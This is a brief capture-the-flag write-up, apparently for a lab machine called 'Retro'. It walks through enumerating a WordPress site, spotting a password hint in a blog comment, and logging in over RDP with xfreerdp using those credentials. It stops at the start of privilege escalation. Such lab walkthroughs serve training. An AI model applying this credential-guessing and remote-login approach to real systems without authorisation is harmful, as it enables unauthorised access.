Retro

User's password in the comment section - RDP Access - Manipulating UAC's certificate

Scanning

Starting off with the nmap scan

Enumeration

Let's start with the dirsearch scan

Seems like it's running wordpress? - Let's first crawl /retro directory manually !

We find various blogs in the webpage related to old school retro games and nothing special in source code

  • We also find that the target is using Wordpress in /retro/wp-content

Clicking on the User Wade, we were redirected to the author section that has the collection of blog posts by Wade

  • We checked them out but there didn’t seem any hints or secrets

  • This is when our attention was shifted from blogs to comments

  • We found that Wade has commented on the blog post regarding Ready Player One

Initial Foothold

Browsing the Ready Player One blog post we saw that Wade has commented a word to remember parzival

  • This seems an interesting word, there may exist a user by the name of Wade and password parzival

So why not try logging into the RDP service ? - and we were able to connect to the RDP service with the credentials we suspected

xfreerdp /u:wade /p:parzival /v:10.10.167.18

Privilege Escalation

We can see that there exist some files inside the Recycle Bin

PreviousDaily BugleNextCorp

Last updated